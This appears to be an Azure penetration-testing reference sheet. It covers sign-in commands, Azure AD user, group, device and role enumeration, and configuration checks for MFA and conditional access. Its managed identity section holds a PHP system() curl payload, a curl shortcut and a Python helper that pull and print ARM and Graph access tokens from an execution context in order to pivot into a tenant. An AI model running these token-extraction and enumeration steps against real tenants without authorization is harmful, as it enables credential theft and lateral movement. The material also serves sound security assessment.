Azure Operator Reference

Azure connection, enumeration, configuration review, and managed identity commands in one reference.

One Azure reference page for connection setup, Azure AD enumeration, tenant review, and managed identity driven API enumeration.

Authentication and Session Setup

Start here when you need a quick login path before moving into tenant or subscription inspection.

AzureAD Module

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<[email protected]>", $password)
Connect-AzureAD -Credential $creds

Azure CLI

az login --username "<[email protected]>" --password "<password>"

Azure Resource Toolkit

Connect-ART -Username "<[email protected]>" -Password "<password>"

PowerShell Remoting

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("<username>", $password)
$session = New-PSSession -ComputerName "<target-host-or-ip>" -Credential $creds
Enter-PSSession -Session $session

Azure AD Enumeration

Use these blocks for user, group, device, app, and role discovery across the tenant.

Users

Get-AzureADUser -All $true
Get-AzureADUser -All $true | Select-Object UserPrincipalName
Get-AzureADUser -ObjectId "<[email protected]>"
Get-AzureADUser -SearchString "admin"
Get-AzureADUser -All $true | Where-Object { $_.DisplayName -match "admin" }
Get-AzureADUser -ObjectId "<[email protected]>" | Format-List *
Get-AzureADUser -ObjectId "<[email protected]>" | ForEach-Object { $_.PSObject.Properties.Name }
Get-AzureADUser -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -ne $null }
Get-AzureADUser -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -eq $null }

User-Created and Owned Objects

Get-AzureADUser | Get-AzureADUserCreatedObject
Get-AzureADUserOwnedObject -ObjectId "<[email protected]>"

Groups

Get-AzureADGroup -All $true
Get-AzureADGroup -ObjectId "<group-object-id>"
Get-AzureADGroup -SearchString "admin" | Format-List *
Get-AzureADGroup -All $true | Where-Object { $_.DisplayName -match "admin" }
Get-AzureADMSGroup | Where-Object { $_.GroupTypes -eq "DynamicMembership" }
Get-AzureADGroup -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -ne $null }
Get-AzureADGroup -All $true | Where-Object { $_.OnPremisesSecurityIdentifier -eq $null }
Get-AzureADGroupMember -ObjectId "<group-object-id>"

Memberships and Directory Roles

Get-AzureADUser -SearchString "test" | Get-AzureADUserMembership
Get-AzureADUserMembership -ObjectId "<[email protected]>"
Get-AzureADDirectoryRoleTemplate
Get-AzureADDirectoryRole
# The built-in role's DisplayName contains a space ("Global Administrator"); "GlobalAdministrator" matches nothing
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember

Devices

Get-AzureADDevice -All $true | Format-List *
Get-AzureADDeviceConfiguration | Format-List *
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADUserOwnedDevice -ObjectId "<[email protected]>"
Get-AzureADUserRegisteredDevice -ObjectId "<[email protected]>"
# Compare against the boolean, not the string: any non-empty string coerces to $true and would also match non-compliant devices
Get-AzureADDevice -All $true | Where-Object { $_.IsCompliant -eq $true }

Applications and Service Principals

Get-AzureADApplication -All $true
Get-AzureADApplication -ObjectId "<application-object-id>" | Format-List *
Get-AzureADApplication -All $true | Where-Object { $_.DisplayName -match "app" }
Get-AzureADApplication -ObjectId "<application-object-id>" | Get-AzureADApplicationOwner | Format-List *
Get-AzureADUser -ObjectId "<[email protected]>" | Get-AzureADUserAppRoleAssignment | Format-List *
Get-AzureADGroup -ObjectId "<group-object-id>" | Get-AzureADGroupAppRoleAssignment | Format-List *

Get-AzureADServicePrincipal -All $true
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Format-List *
Get-AzureADServicePrincipal -All $true | Where-Object { $_.DisplayName -match "app" }
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalOwner | Format-List *
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalOwnedObject
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalCreatedObject
Get-AzureADServicePrincipal -ObjectId "<service-principal-object-id>" | Get-AzureADServicePrincipalMembership | Format-List *
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership

Az PowerShell and Azure CLI Resource Discovery

Get-AzResource
Get-AzRoleAssignment -SignInName "<[email protected]>"
Get-AzVM | Format-List
Get-AzWebApp | Where-Object { $_.Kind -notmatch "functionapp" }
Get-AzFunctionApp
Get-AzStorageAccount | Format-List
Get-AzKeyVault
az vm list
az vm list --query "[].[name]" -o table
az webapp list
az functionapp list --query "[].[name]" -o table
az storage account list --query "[].[name]" -o table
az keyvault list

Configuration Review

Keep this section for high-signal checks around roles, MFA posture, conditional access, and auditing.

Current User Role Assignments

$mySignInName = (Get-AzContext).Account.Id
Get-AzRoleAssignment -SignInName $mySignInName |
  Format-Table -Property RoleDefinitionName, Scope

Legacy Protocol and Strong Authentication Checks

Connect-MsolService
Get-MsolCompanyInformation | Select-Object -ExpandProperty UsersForStrongAuthentication

Users Without MFA

Install-Module MSOnline   # Connect-MsolService and Get-MsolUser come from the MSOnline module, not AzureAD
Connect-MsolService
Get-MsolUser -All |
  Where-Object { $_.StrongAuthenticationMethods.Count -eq 0 } |
  Select-Object UserPrincipalName, DisplayName

Conditional Access Policies

Get-AzureADPolicy |
  Where-Object { $_.Type -eq "ConditionalAccess" } |
  Select-Object DisplayName, State

Unified Audit Configuration

Connect-ExchangeOnline   # Get-OrganizationConfig is an Exchange Online cmdlet; an EXO session is required
Get-OrganizationConfig | Select-Object -ExpandProperty AuditDisabled

Default User Consent Policy

(Get-AzureADMSAuthorizationPolicy).PermissionGrantPolicyIdsAssignedToDefaultUserRole

Managed Identity and Token Operations

Use this section when you already have an execution context or token source and need to pivot into ARM or Graph.

Microsoft Graph User Enumeration from a Token

$token = "<graph-access-token>"
$uri = "https://graph.microsoft.com/v1.0/users"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

Managed Identity Token Extraction from an Execution Context

<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>

ARM Subscription Enumeration

$token = "<arm-access-token>"
$uri = "https://management.azure.com/subscriptions?api-version=2020-01-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value

ARM Resource Enumeration

$token = "<arm-access-token>"
$subscriptionId = "<subscription-id>"
$uri = "https://management.azure.com/subscriptions/$subscriptionId/resources?api-version=2020-10-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value
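The Invoke-RestMethod calls above, for Graph users and for the ARM subscription and resource lists, read only `.value`, which is the first page; both APIs return a continuation URL for the rest. Added example, not part of the original page: a Python pager that follows ARM `nextLink` and Graph `@odata.nextLink`. The sample pages and the placeholder token are constructed; `fetch_json` is the live fetcher to pass for a real tenant.

```python
import json
import urllib.request

def fetch_json(url, token):
    """Live fetcher: GET the URL with a bearer token and parse the JSON body."""
    request = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(request) as response:
        return json.load(response)

def list_all(url, token, fetch=fetch_json, max_pages=1000):
    """Collect every item from a paged ARM or Graph list endpoint.

    ARM returns the continuation URL as "nextLink", Microsoft Graph as
    "@odata.nextLink"; reading only .value drops every page after the first.
    max_pages bounds the loop so a looping continuation link cannot spin forever.
    """
    items = []
    for _ in range(max_pages):
        page = fetch(url, token)
        items.extend(page.get("value", []))
        url = page.get("nextLink") or page.get("@odata.nextLink")
        if not url:
            return items
    raise RuntimeError(f"paging did not terminate within {max_pages} pages")

# Constructed sample pages (not a real tenant) so the block runs offline.
SUBSCRIPTIONS_URL = "https://management.azure.com/subscriptions?api-version=2020-01-01"
SAMPLE_PAGES = {
    SUBSCRIPTIONS_URL: {
        "value": [{"subscriptionId": "sub-a"}, {"subscriptionId": "sub-b"}],
        "nextLink": SUBSCRIPTIONS_URL + "&$skiptoken=page2",
    },
    SUBSCRIPTIONS_URL + "&$skiptoken=page2": {"value": [{"subscriptionId": "sub-c"}]},
}

def offline_fetch(url, token):
    """Stand-in for fetch_json that serves the constructed pages."""
    return SAMPLE_PAGES[url]

def list_subscription_ids(token="<arm-access-token>", fetch=offline_fetch):
    """Return every subscriptionId across all pages; pass a real token and fetch_json for a live tenant."""
    subs = list_all(SUBSCRIPTIONS_URL, token, fetch=fetch)
    return [s["subscriptionId"] for s in subs]

if __name__ == "__main__":
    print(list_subscription_ids())
```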

ARM Effective Permission Enumeration

$token = "<arm-access-token>"
$subscriptionId = "<subscription-id>"
$resourceGroup = "<resource-group>"
$vmName = "<vm-name>"
$uri = "https://management.azure.com/subscriptions/$subscriptionId/resourceGroups/$resourceGroup/providers/Microsoft.Compute/virtualMachines/$vmName/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
$requestParams = @{
  Method = "GET"
  Uri = $uri
  Headers = @{
    Authorization = "Bearer $token"
  }
}

(Invoke-RestMethod @requestParams).value
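To turn the permissions response above into a least-privilege verdict for the identity, this added Python evaluator (not part of the original page) applies Azure RBAC semantics: `*` wildcards match across path segments, comparison is case-insensitive, and notActions subtract only from actions of the same assignment. The response and the action list are constructed, not taken from a real tenant.

```python
import re

def matches_action(pattern, action):
    """Azure RBAC wildcard: '*' matches any characters, slashes included; case-insensitive."""
    regex = "^" + ".*".join(re.escape(part) for part in pattern.split("*")) + "$"
    return re.match(regex, action, re.IGNORECASE) is not None

def is_allowed(permissions, action, data_action=False):
    """True if some single permission entry grants the action and does not exclude it.

    notActions only subtract from actions of the same entry (one role assignment),
    so the check is per entry and the verdicts are OR-ed across entries.
    """
    allow_key, deny_key = ("dataActions", "notDataActions") if data_action else ("actions", "notActions")
    for entry in permissions:
        granted = any(matches_action(p, action) for p in entry.get(allow_key, []))
        excluded = any(matches_action(p, action) for p in entry.get(deny_key, []))
        if granted and not excluded:
            return True
    return False

def review(permissions, actions):
    """Map each action of interest to its effective allow (True) or deny (False)."""
    return {action: is_allowed(permissions, action) for action in actions}

# Constructed response (not real tenant data) in the shape of the permissions API (api-version 2015-07-01)
SAMPLE_RESPONSE = {"value": [
    {   # Reader-style assignment: read everything, change nothing
        "actions": ["*/read"], "notActions": [],
        "dataActions": [], "notDataActions": [],
    },
    {   # Custom role: all VM control-plane operations except delete
        "actions": ["Microsoft.Compute/virtualMachines/*"],
        "notActions": ["Microsoft.Compute/virtualMachines/delete"],
        "dataActions": [], "notDataActions": [],
    },
]}

# Actions whose presence on a workload identity usually warrants a least-privilege review.
HIGH_IMPACT_ACTIONS = [
    "Microsoft.Compute/virtualMachines/read",
    "Microsoft.Compute/virtualMachines/write",
    "Microsoft.Compute/virtualMachines/delete",
    "Microsoft.Compute/virtualMachines/runCommand/action",
    "Microsoft.Authorization/roleAssignments/write",
]

if __name__ == "__main__":
    for action, ok in review(SAMPLE_RESPONSE["value"], HIGH_IMPACT_ACTIONS).items():
        print(f"{'allow' if ok else 'deny ':5} {action}")
```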

Use an ARM Token with Az PowerShell

$token = "<arm-access-token>"
Connect-AzAccount -AccessToken $token -AccountId "<managed-identity-client-id>"
Get-AzResource

Curl Shortcut

curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" \
  -H "secret:$IDENTITY_HEADER"

Python Helper for ARM and Graph Tokens

import json
import os
import urllib.parse
import urllib.request

# The identity endpoint and its per-instance secret header are injected into the
# execution context (App Service, Functions, and similar hosts) as environment variables.
identity_endpoint = os.environ["IDENTITY_ENDPOINT"]
identity_header = os.environ["IDENTITY_HEADER"]


def get_token(resource):
    """Request a managed identity token for the given resource audience."""
    query = urllib.parse.urlencode({"resource": resource, "api-version": "2017-09-01"})
    request = urllib.request.Request(
        f"{identity_endpoint}?{query}",
        headers={"secret": identity_header},
    )
    with urllib.request.urlopen(request) as response:
        return json.load(response)


arm_token = get_token("https://management.azure.com/")
print("[+] Management API")
print("Access Token: " + arm_token["access_token"])
print("ClientID: " + arm_token["client_id"])

graph_token = get_token("https://graph.microsoft.com/")
print("\n[+] Graph API")
print("Access Token: " + graph_token["access_token"])
print("ClientID: " + graph_token["client_id"])